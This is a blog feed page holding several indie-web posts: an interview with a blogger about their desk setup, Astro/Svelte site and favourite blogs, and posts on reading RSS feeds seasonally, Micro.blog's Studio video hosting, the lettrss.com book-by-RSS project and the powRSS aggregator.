I have a pretty particular desk setup for ergonomic/health reasons. I am physically incapable of being a laptop-in-a-coffee-shop kind of person, my fingers will start to turn numb as I use the trackpad, and I've used a custom keyboard layout for so long I can't really get work done on a traditional keyboard layout! If I'm writing at my computer, I need to be in my home office, at my PC, with my Ergodox EZ (a split ortholinear keyboard that has served me very well over the past few years), and a drawing tablet as a pointer device. I like it to be nice and quiet when I'm writing, if there's background noise, I can't hear my internal voice over the sound of other people speaking! Even with this particular setup, sitting at my desk does tire me out more than most people, so on very rare occasions I will draft a post with pen and paper. Unlike with computer writing, I'm completely agnostic as to what materials I actually write with, I've occasionally written post outlines on stray receipts or napkins.
I built my personal site with Astro and Svelte! I have a whole series on the topic of building my website if you want a peek under the hood at how I did it. There's so much I want to do to extend the site, but I find the biggest obstacle remains creating the graphics. The funny thing is, I definitely feel a sense of dread when looking at a blank canvas, even when I know what the final product is going to look like. Maybe putting this out there in the world will be the kick in the butt I need to make progress! Everything is managed in code and Markdown, without a CMS. Though it does have flaws and limitations when it comes to certain components, Markdown remains my favorite format for drafting pretty much anything. My site is currently hosted on Cloudflare. I fully admit that it's not very IndieWeb of me, I do feel strongly about potentially moving off big tech infrastructure, but I'm not very good at managing servers on my own and I'm a bit scared to do so with the prevalence of bad-faith crawlers. Yeah, I wouldn't write the components in Svelte. If you look back at my posts, I acknowledge that I would probably regret this decision and want to use web components later, but at the time I lacked the web components knowledge to execute the vision properly. No shade against Svelte, it's just that for something like my blog, I prefer to deal with less of a maintenance burden than I might willingly take on for a work project, since I'm only in the codebase a couple of times a year. There are some features/syntax that I'm using that will likely be deprecated in future versions of Svelte, so that's a pain I will have to deal with eventually. In my youth, I definitely had a bit of 'shiny new thing syndrome' when it came to web technologies. Nowadays, I prefer things that are more stable and slow. I've been burned just a few too many times for me to feel excited about proprietary technology! I pay $24 USD for a domain name.
I swear it used to be cheaper in the past! I also pay for Plausible and Tinylytics as I believe in paying for privacy-respecting services. I started with Plausible, and at some point I became preoccupied with having a heart button for my posts, so I added Tinylytics. It's on my long list of todos to sort this out, I definitely don't need both. I mainly keep analytics to know where my posts are being linked from — doing this has helped me find some really awesome people and blogs (badum-tsh). Other than that, keeping the site running is free. This might change in the future, I do want to do more fun things that might require more financial resources, but I don't have any intent to monetize it, it's just a little home on the internet that I'm happy to throw cash at to keep the (metaphorical) lights on.

In no particular order, here's a list of blogs I've been really enjoying. I think there will be some level of overlap with the People and Blogs folks, as I've been a long-time reader and found many folks worth following through this series, so thank you Manu! After rambling on for far too long for most of this, I'm finally at a loss for words. I'd be much obliged if you visited my site but you can also follow me on Mastodon if you have a hankering for some shelter cat pics. I have a submission coming out for the 'Free To Play' gaming-themed zine under Difference Engine, a Singaporean indie comics publisher. It's a collaboration with the narrative designer & writer Sarah Mak, I hope you'll check it out when the time comes!

Now that you're done reading the interview, go check the blog and subscribe to the RSS feed. If you're looking for more content, go read one of the previous 115 interviews. Make sure to also say thank you to Luke Dorny and the other 124 supporters for making this series possible. Like Keenan, who I found through this series and is rapidly becoming one of my all-time favorite bloggers. Keenan is a true wordsmith, and an incredibly kind human.
They're so good at what they do that they managed to completely break some assumptions I had about myself, like I thought I hated the podcast format of 'two friends chatting' until they started one with Halsted! Ethan Marcotte has been absolutely killing it lately. His work is quiet and thoughtful, but in a wonderfully understated way that sticks in your brain for a long, long time. I've never seen anyone write as much as Jim Nielsen does and still have as many awesome posts. Come on, what's your secret Jim? Melanie Richards is one of the main reasons I want to start blogging about my other creative hobbies a bit more. She also has one of the prettiest blog designs I have ever seen! Everything I know about web sustainability, I have probably learned directly from Fershad Irani's blog. Eric Bailey writes the kind of posts that I send to every single person I know in the industry as soon as I see them hit my feed. Robert Kingett's website tagline is 'A fabulously blind romance author', what's not to love? Robert has written numerous pieces that have completely reshaped how I feel about certain topics. His writing style is persuasive with a heaped tablespoon of humor for good measure. The final two folks don't post that regularly, but they are my friends so I am allowed to nudge them in the hope it will make them post more often. Jan Maarten and Katherine Yang have blogs that are so unapologetically them. More posts, please!

0 views
pabloecortez 2 weeks ago

You can read the web seasonally

What if you read things around the web the way you watch movies or listen to music? A couple of days ago I made a post on Mastodon introducing lettrss.com, a project I built that takes a book in the public domain and sends one chapter a day to your RSS reader. Xinit replied with a great point about RSS feed management: "This is fascinating, but I know how it would go based on the thousands of unread RSS feeds I've had, and the thousands of unheard podcasts I subscribed to. I'd end up with an RSS of unread chapters, representing a whole book in short order. Regardless of my inability to deal, it remains a great idea, and I will absolutely recommend while hiding my shame of a non-zero inbox."

When I first started using RSS, I thought I'd found this great tool for keeping tabs on news, current events, and stuff I should and do care about. After adding newspapers, blogs, magazines, publications, YouTube channels and release notes from software I use, I felt a false sense of accomplishment, like I'd finally been able to wrangle the craziness of the internet into a single app, like I had rebelled against the algorithm™️. But it didn't take long to accumulate hundreds of posts, most of which I had no true desire to read, and soon after I abandoned my RSS reader. I came back to check on it from time to time, but its dreadful little indicator of unread posts felt like a personal failure, so eventually I deleted it entirely. Will Hopkins wrote a great post on this exact feeling, "I don't actually like to read later": I used Instapaper back in the day, quite heavily. I built up a massive backlog of items that I'd read occasionally on my OG iPod Touch. At some point, I fell off the wagon, and Instapaper fell by the wayside. [...] The same thing has happened with todo apps over the years, and feed readers. They become graveyards of good intentions and self-imposed obligations.
Each item is a snapshot in time of my aspirations for myself, but they don't comport to the reality of who I am. I couldn't have said it better myself. For me, this only happens with long-form writing: whenever I come across an essay or blog post that I know will require either my full attention or a bit more time than I'm willing to give it in the moment, it ends up languishing unread. I've never had that issue with music. Music is more discrete. It's got a timestamp. I listen to music through moods and seasons, so much so that I make a playlist for every month of the year like a musical scrapbook.

What if we took this approach to RSS feeds? Here's what I replied to Xinit: This is something I find myself struggling with too. I think I'm okay knowing some RSS feeds are seasonal, same as music genres throughout the year. Some days I want rock, others I want jazz. Similarly with RSS feeds, I've become comfortable archiving and resurfacing feeds. For reference, I follow around 10 feeds at any given time, and the feeds I follow on my phone are different from the ones on my desktop. You shouldn't feel guilty about removing feeds from your RSS readers. It's not a personal failure, it's an allocation of resources like time and attention.

0 views
HeyDingus 2 weeks ago

Micro.blog offers an indie alternative to YouTube with its ‘Studio’ video hosting plan

The core of Micro.blog’s mission is to make it easy for people to own their presence on the web. At first, it was a simple blog host that also incorporated a Twitter-like social timeline that put short (title-less) and long (titled) posts on equal footing. In the years since its 2017 launch, Manton Reece — Micro.blog’s founder — has added a plethora of features that expand upon that mission. Here’s a list off the top of my head (the full list appears at the end of this post). All of this is hosted on your own website, (optionally, but strongly encouraged) at your own domain name. I’ve never seen anything else like it. There are plans ranging from $1/month to $15/month that include subsets of these features, depending on how much of a blogging “power user” you are.

Reece’s next big foray 1 with Micro.blog: video hosting, which launched yesterday. Micro.blog Studio adds longer video hosting for your blog, with uploads up to 20 minutes. You can read some of the technical bits here. It can automatically copy videos to PeerTube and Bluesky too. That’s a quaint description for what promises to be a significant challenge. 2 Because if hosting videos were easy, YouTube wouldn’t be the only game in town. 3 And that’s exactly why Reece has pursued it. It’s not good for the open web for so much of its video content to live centralized at one host. John Gruber lamented this following Jimmy Kimmel’s suspension: “The big problem is YouTube. With YouTube, Google has a centralized chokehold on video. We need a way that’s as easy and scalable to host video content, independently, as it is for written content. I don’t know what the answer to that is, technically, but we ought to start working on it with urgency.”

Just like Micro.blog encourages people to own their text, reading lists, podcasts, photos, and social network interactions at their own domain, that ethos now extends to videos too. One of the great things about Micro.blog is how it enables the Publish to Own Site, Syndicate Elsewhere (POSSE) framework.
That’s manifested in features like its automatic crossposting to Bluesky, Flickr, LinkedIn, Mastodon, Medium, Nostr, Pixelfed, Threads, and Tumblr. And manual crossposting elsewhere. This allows the “source of truth” to be at your own website that you control, but you won’t miss out on conversations and audiences in other places. With expanded video hosting, Reece has added PeerTube as another automatic crossposting destination, and hopes to also enable YouTube if and when Google approves his application. It’s not about only posting to your website, but instead centralizing your website as the first and primary place you post and then getting your text, images, audio, and now video out to other networks from there. As you can probably tell, I’m pretty excited about Micro.blog taking on the challenge of being that “indie-focused, YouTube alternative” that Reece envisioned. I haven’t upgraded my plan yet, but only because I mainly post shorter videos (covered by my current ‘Premium’ plan). Still, I’m very glad it now exists as an option. There’s never been a better time to own your spot on the web. If you haven’t checked out Micro.blog before, I think it’s a compelling place to look.

Update 2025-11-11: I was in a hurry when I posted this earlier, and it slipped my mind to include some wants and wishes that I have for Micro.blog’s video hosting capabilities. It’s a short list, due to both Reece’s solid offering from the outset, and my lack of imagination. 😆

Scale time limits across the tiers. I really think video hosting would be a stronger offering if it were available more consistently across Micro.blog’s tiers. For example, 1-minute videos at $5/month, 5-minute videos at $10/month, 10-minute videos at $15/month, and 20-minute videos at $20/month. All with the same capabilities, but limited by length. This was something that I know Reece considered, but ultimately decided against in the name of simplicity.
He didn’t want to muck up the existing plans, and (rightly) considers them a tremendous value with their current features. He obviously hopes that people will upgrade to the higher-priced Studio plan specifically for the new video stuff. But I think tying some video features (multiple resolutions and fast playback on your blog) to the 20-minute time limit and $20 plan creates more confusion, a feature gap, and a missed opportunity. Take me for example. I think I could reasonably say that I’m a Micro.blog power user. But even I’m not sure if I’m correct in saying that those unique features are limited to the Studio plan. I know everyone gets video uploads up to 1 minute in length. (Maybe not everyone, though. Do Micro.one users at $1/month get the “new” video features? I’m not sure.) Historically, most of the videos I post are around 90 seconds in length. I’m far more likely to shave 30 seconds off my videos to fit a 1-minute time limit than I am to double my monthly cost to show those extra 30 seconds. There’s too big a gap between 1-minute videos and 20-minute videos to make it seem worthwhile. In my mind, I’d be “wasting” the extra $10/month ($120/year) by not posting 20-minute videos. But I’d be more likely to pay a little extra money for a little extra time. And then if I started hitting that new limit, I’d feel incentivized and validated in graduating up to the next tier. I worry that Reece will see more infrastructure cost with a bunch of 1-minute videos being uploaded and served, but won’t see an accompanying bump in revenue, since we’re all getting the 1-minute videos for “free,” and I don’t see a significant portion of Micro.blog users needing the 20 minutes. Said one more way, I think giving people a little headroom to grow into hosting their videos on Micro.blog will make them more likely to upgrade over time. Once that habit has solidified, and users are comfortable with it, paying $5 more for the next jump in time limit isn’t a big ask.
But jumping right into the Studio plan for $10-$15 extra is kind of off-putting. The gap between 1 minute and 20 is just too big.

Support 4K resolution. A pie-in-the-sky request, I know. 4K videos are huge. But I can nearly always see the difference, and choose higher quality playback every time. I’d love for my videos to appear at full quality if they’re uploaded that way.

1. To be clear, Micro.blog has had the ability to host videos — or nearly any other kind of file upload — and show them on your blog for years. But it’s been limited by file size, not an optimized part of the offering. The Studio tier makes it a first-rate feature, with smooth playback, automatic conversion to multiple resolutions, and ups the limit to a healthy 20 minutes no matter the file size. And the old file size-limited video uploads should still work for folks who rely on that workflow. 👌 ↩︎
2. Here’s a little more on the what and the why from Reece. ↩︎
3. Sure, Vimeo exists, but it’s expensive and limited, and its future is uncertain. Plus, you’re still posting to a domain. And, of course, many people post videos to Instagram, Facebook, TikTok, X, and other social networks. But I’d argue that videos there serve the algorithm first and users second. Micro.blog’s Studio tier flips that. It’s meant to serve the user first, and there is no algorithm at all. ↩︎

HeyDingus is a blog by Jarrod Blundy about technology, the great outdoors, and other musings. If you like what you see — the blog posts, shortcuts, wallpapers, scripts, or anything — please consider leaving a tip, checking out my store, or just sharing my work. Your support is much appreciated! I’m always happy to hear from you on social, or by good ol' email.
Hosting podcasts
Bookmarking/archiving webpages
Fediverse compatibility with native replies to Mastodon and novel reply gathering from Bluesky
Crossposting to other social networks
Photo blogging
Custom domain name registration
Private notes
Book/Movie/TV Show blogging
Reading tracking
Automatic newsletters
Open APIs to manage your content

0 views
pabloecortez 2 weeks ago

Read a book via RSS with lettrss.com

If you picked a book and sent one chapter a day to my RSS reader, I'm sure I'd read it all. I'll be putting this to the test with lettrss.com, a project I built to syndicate books in the public domain via RSS. lettrss - read public domain books via RSS Since the second part of the Wicked movie is coming out on November 21 in the United States, I thought it’d be fun to start this RSS project with The Wonderful Wizard of Oz by L. Frank Baum.
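lettrss's actual implementation isn't shown here, but the core mechanic, releasing one chapter per day as RSS items, is simple to sketch. Here's a minimal, hypothetical version in Python using only the standard library (the function name, feed URL, and structure are illustrative assumptions, not lettrss's real code):

```python
from datetime import date, datetime, timedelta, timezone
from email.utils import format_datetime
import xml.etree.ElementTree as ET

def build_feed(book_title, chapters, start, today=None):
    """Build an RSS 2.0 feed with one <item> per chapter whose release
    day (start date + chapter index, one chapter per day) has arrived."""
    today = today or date.today()
    rss = ET.Element("rss", version="2.0")
    channel = ET.SubElement(rss, "channel")
    ET.SubElement(channel, "title").text = book_title
    ET.SubElement(channel, "link").text = "https://example.com/feed"  # placeholder URL
    ET.SubElement(channel, "description").text = f"{book_title}, one chapter a day"
    for i, (chapter_title, body) in enumerate(chapters):
        release = start + timedelta(days=i)
        if release > today:
            break  # later chapters are not released yet
        item = ET.SubElement(channel, "item")
        ET.SubElement(item, "title").text = chapter_title
        ET.SubElement(item, "description").text = body
        # RFC 822 date format, as RSS 2.0 expects for pubDate
        pub = datetime(release.year, release.month, release.day, tzinfo=timezone.utc)
        ET.SubElement(item, "pubDate").text = format_datetime(pub)
    return ET.tostring(rss, encoding="unicode")
```

A reader polling this feed would see exactly one new item appear per day; the subscriber's RSS app handles unread tracking and delivery.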

0 views
pabloecortez 3 weeks ago

How I discover new (and old) blogs and websites

One of the great things about having a blog is that you get a space that is entirely yours, where you share whatever you want and you make it look exactly how you want it to look. It's a labor of creativity and self-expression. An encouraging aspect of having a blog is also being read by others. I love receiving emails from people who liked a post. It's just nice to know I'm not shouting into the void! But take, for instance, posts I wrote last year or many years ago. How do those get discovered? Perhaps you wrote an awesome essay on your favorite topic back in 2022. How can I or anyone else stumble upon your work? Making it easy to discover hidden gems from the indie web was my motivation for making powRSS. powRSS is a public RSS feed aggregator to help you find the side of the internet that seldom appears on corporate search engines. It surfaces posts and blogs going all the way back to 1995. You never know what you're going to find and I think it's really fun. Today I made a video showing how it works.
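The post doesn't describe how powRSS works internally, but the heart of any feed aggregator is the same: fetch many RSS feeds, flatten their items, and sort by date. A rough, hypothetical sketch of that merging step in Python (parsing only, no networking; all names are illustrative):

```python
from email.utils import parsedate_to_datetime
import xml.etree.ElementTree as ET

def merge_feeds(raw_feeds):
    """Flatten several raw RSS 2.0 documents into a single list of
    (blog_title, post_title, published) tuples, oldest first."""
    items = []
    for xml_text in raw_feeds:
        channel = ET.fromstring(xml_text).find("channel")
        blog_title = channel.findtext("title", default="untitled")
        for item in channel.iter("item"):
            # RSS pubDate uses RFC 822 dates, e.g. "Mon, 01 Jan 1996 00:00:00 GMT"
            published = parsedate_to_datetime(item.findtext("pubDate"))
            items.append((blog_title, item.findtext("title"), published))
    return sorted(items, key=lambda entry: entry[2])
```

Sorting oldest-first is what would let posts "going all the way back to 1995" resurface alongside new ones; a real aggregator would also need fetching, deduplication, and tolerance for Atom feeds and malformed dates.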

3 views